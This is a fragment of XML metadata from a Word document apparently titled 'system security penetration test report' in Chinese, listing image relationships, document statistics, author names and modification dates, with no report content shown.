Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.jpe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jpe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2.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0.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jpeg"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://static.wooyun.org/wooyun/upload/201505/261950541076ed36680b3f4e70dc40209b6b1efe.png" TargetMode="External"/><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jpe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jpe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jpe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1AB1B6-BF81-4BAE-AAA0-17788084579E}">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15581</Words>
  <Characters>88816</Characters>
  <Lines>740</Lines>
  <Paragraphs>208</Paragraphs>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>104189</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秦炳杰</dc:creator>
  <cp:lastModifiedBy>bingjie</cp:lastModifiedBy>
  <cp:lastPrinted>2018-10-17T04:21:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-11T08:29:17Z</dcterms:modified>
  <dc:title>系统安全渗透测试报告</dc:title>
  <cp:revision>3966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2398F383288A42C4B9036B5D7743F9DF</vt:lpwstr>
  </property>
</Properties>
</file>